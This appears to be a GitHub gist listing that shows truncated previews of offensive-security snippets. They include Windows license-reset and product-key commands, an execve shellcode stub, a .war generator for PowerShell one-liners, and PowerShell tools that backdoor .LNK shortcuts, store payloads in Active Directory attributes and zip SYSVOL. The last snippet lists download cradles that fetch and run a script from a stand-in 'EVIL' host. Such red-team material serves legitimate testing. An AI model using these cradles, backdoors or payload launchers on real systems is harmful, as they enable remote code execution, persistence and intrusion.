This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
cscript.exe %windir%\system32\slmgr.vbs /rilc | |
cscript.exe %windir%\system32\slmgr.vbs /upk | |
cscript.exe %windir%\system32\slmgr.vbs /ckms | |
cscript.exe %windir%\system32\slmgr.vbs /cpky | |
cscript.exe %windir%\system32\slmgr.vbs /ipk VK7JG-NPHTM-C97JM-9MPGT-3V66T | |
sc config LicenseManager start= auto & net start LicenseManager | |
sc config wuauserv start= auto & net start wuauserv | |
clipup -v -o -altto c:\ |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
/* | |
* Example of simple execve('/bin/sh', ...); shellcode compiled | |
* and embedded within C program, then compiled on 64-bit with NX bit | |
* turned off and set executable stack. | |
* | |
* Compilation: | |
* $ gcc -fno-stack-protector -z execstack execve1.c -o execve1c | |
*/ | |
/* |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/python | |
# Code that quickly generates a deployable .war for a PowerShell one-liner | |
import zipfile | |
import StringIO | |
import sys | |
def generatePsWar(psCmd, appName): |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Function Invoke-HostFile { | |
<# | |
.SYNOPSIS | |
Hosts a base64 string representation of a binary file or a given | |
$FilePath on the specified $Port. Any HTTP request to the given | |
host/port will return the binary data of the specified file. | |
.PARAMETER Base64File | |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Function Start-FileSystemMonitor { | |
<# | |
.SYNOPSIS | |
This function will monitor one or more file paths for any file | |
creation, deletion, modification, or renaming events. Data including | |
the change type, ACL for the file, etc. is output to the screen or | |
a specified -LogFile. | |
If -InjectShellCmd is specified, the given command is inserted into |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#Requires -Version 2 | |
function New-ADPayload { | |
<# | |
.SYNOPSIS | |
Stores PowerShell logic in the mSMQSignCertificates of the specified -TriggerAccount and generates | |
a one-line launcher. | |
Author: @harmj0y |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
function Set-LNKBackdoor { | |
<# | |
.SYNOPSIS | |
Backdoors an existing .LNK shortcut to trigger the original binary and a payload specified by | |
-ScriptBlock or -Command. | |
Author: @harmj0y | |
License: BSD 3-Clause | |
Required Dependencies: None |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
function New-SYSVOLZip { | |
<# | |
.SYNOPSIS | |
Compresses all folders/files in SYSVOL to a .zip file. | |
Author: Will Schroeder (@harmj0y) | |
License: BSD 3-Clause | |
Required Dependencies: None |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
void Payload() { | |
DWORD threadId; | |
CreateThread( | |
NULL, // default security attributes | |
0, // use default stack size | |
MyThreadFunction, // thread function name | |
NULL, // argument to thread function | |
0, // use default creation flags | |
&threadId); | |
} |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# normal download cradle | |
IEX (New-Object Net.Webclient).downloadstring("http://EVIL/evil.ps1") | |
# PowerShell 3.0+ | |
IEX (iwr 'http://EVIL/evil.ps1') | |
# hidden IE com object | |
$ie=New-Object -comobject InternetExplorer.Application;$ie.visible=$False;$ie.navigate('http://EVIL/evil.ps1');start-sleep -s 5;$r=$ie.Document.body.innerHTML;$ie.quit();IEX $r | |
# Msxml2.XMLHTTP COM object |